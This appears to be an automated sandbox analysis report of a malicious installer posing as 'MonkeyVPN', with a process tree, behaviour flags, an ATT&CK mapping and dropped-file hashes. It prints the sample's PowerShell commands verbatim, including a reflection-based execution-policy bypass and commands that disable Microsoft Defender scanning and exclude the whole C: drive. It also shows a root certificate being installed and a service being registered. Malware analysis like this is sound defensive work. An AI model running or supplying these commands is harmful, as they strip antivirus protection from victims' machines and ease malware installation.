powershell.exe chrome.exe PID 2368 wrote to memory of 4956 2368 powershell.exe chrome.exe PID 2368 wrote to memory of 4956 2368 powershell.exe chrome.exe PID 2368 wrote to memory of 4956 2368 powershell.exe chrome.exe PID 4956 wrote to memory of 2392 4956 chrome.exe msedge.exe PID 4956 wrote to memory of 2392 4956 chrome.exe msedge.exe PID 4956 wrote to memory of 2392 4956 chrome.exe msedge.exe PID 4956 wrote to memory of 2392 4956 chrome.exe msedge.exe PID 2392 wrote to memory of 400 2392 msedge.exe powershell.exe PID 2392 wrote to memory of 400 2392 msedge.exe powershell.exe PID 2392 wrote to memory of 4420 2392 msedge.exe naver.exe PID 2392 wrote to memory of 4420 2392 msedge.exe naver.exe PID 2768 wrote to memory of 2144 2768 naver.exe wmic.exe PID 2768 wrote to memory of 2144 2768 naver.exe wmic.exe PID 2768 wrote to memory of 4556 2768 naver.exe wmic.exe PID 2768 wrote to memory of 4556 2768 naver.exe wmic.exe PID 2768 wrote to memory of 4224 2768 naver.exe wmic.exe PID 2768 wrote to memory of 4224 2768 naver.exe wmic.exe PID 2768 wrote to memory of 3212 2768 naver.exe wmic.exe PID 2768 wrote to memory of 3212 2768 naver.exe wmic.exe PID 2768 wrote to memory of 5076 2768 naver.exe wmic.exe PID 2768 wrote to memory of 5076 2768 naver.exe wmic.exe PID 2768 wrote to memory of 1684 2768 naver.exe wmic.exe PID 2768 wrote to memory of 1684 2768 naver.exe wmic.exe PID 2768 wrote to memory of 1148 2768 naver.exe powershell.exe PID 2768 wrote to memory of 1148 2768 naver.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionExtension '.exe' -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:400 -
C:\Users\Admin\AppData\Local\naver\naver.exeC:\Users\Admin\AppData\Local\naver\naver.exe -install5⤵
- Sets service image path in registry
- Executes dropped EXE
PID:4420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\start.exestart.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI84BB.tmp4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1180
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4336,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:81⤵PID:3904
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A1A994092043BF518784C20154836C06 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:376
-
C:\Users\Admin\AppData\Local\naver\naver.exe"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:2144
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:4556
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4224
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:3212
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:5076
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:1684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:1148
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
944B
MD562477035d09eca55a37aa3ec60270868
SHA11ba72f9dd882e481b7b41dc21865459e9ee498a3
SHA256070316ee9aeb1f07c2574cfc3adcd262a0bd9bee56561a759c15cd8112bc8d64
SHA512c3922b9dc83102b1857488ce88fcc8a069892e2cf02663fa8f2f53546bcaadea30c72b5883b89e6266f01b8f8add45614ceeb21b874b1383dd3587798a6de449
-
Filesize
30.3MB
MD571141c5e6c5aa8e363f64c6014588d9b
SHA1fd759473d536ce9423d3e9efb6f0b118f149e0d4
SHA25626188d91a417a4c4c8c9226015ad6b5f4ddb86ca3bac9031206efc9e45acfc8e
SHA512187314ecf0395d2245d37b0b3f2361896dcf6f6fa0d30b0c724c8a73a9d45c1798357654d863c8b304f775bfd32f0c30e0735a7abb5edbe0aeb4166046472b41
-
Filesize
298KB
MD5684f2d21637cb5835172edad55b6a8d9
SHA15eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA5127b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
30.4MB
MD55b073f98aab6e4f779aadd9f9d4b75a2
SHA1c81700159450dc0ac7c40f7e73203a963fd83e9a
SHA2560b04da17c658f67b1b74afb9831e09664dc976a401350a9b8e1f76c1e3c5caca
SHA51284c4be46cbdbc40e5a90e2dce2a1c58ecf6816cc47cc9aa4105730deefb8c691ce406aa35b90152baffcf93564dec4ce747995ee0ba2573f6fa480f3e143780d
-
Filesize
5.3MB
MD52bf9eaf0d2693850c39817b4b797cf43
SHA1e93f0ff794ab20bdda2f81d210f4869823455888
SHA256325502bedbb2a25218b2004535a679a8fe08daf44ad87ebe98db7dc4f3278026
SHA5122b7b6ca1bcffcb5a6007f938186dff14549bde8d8f5e61883525133a083d69812d28a1a41507a38d210283b4766b67442828259f45f7996f9e5beb4784f2166c
-
Filesize
22KB
MD52dd515ea546a81398d94dd15e3b4d55c
SHA1eb0b0fca721a296906166b7e972559b87353b726
SHA256becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb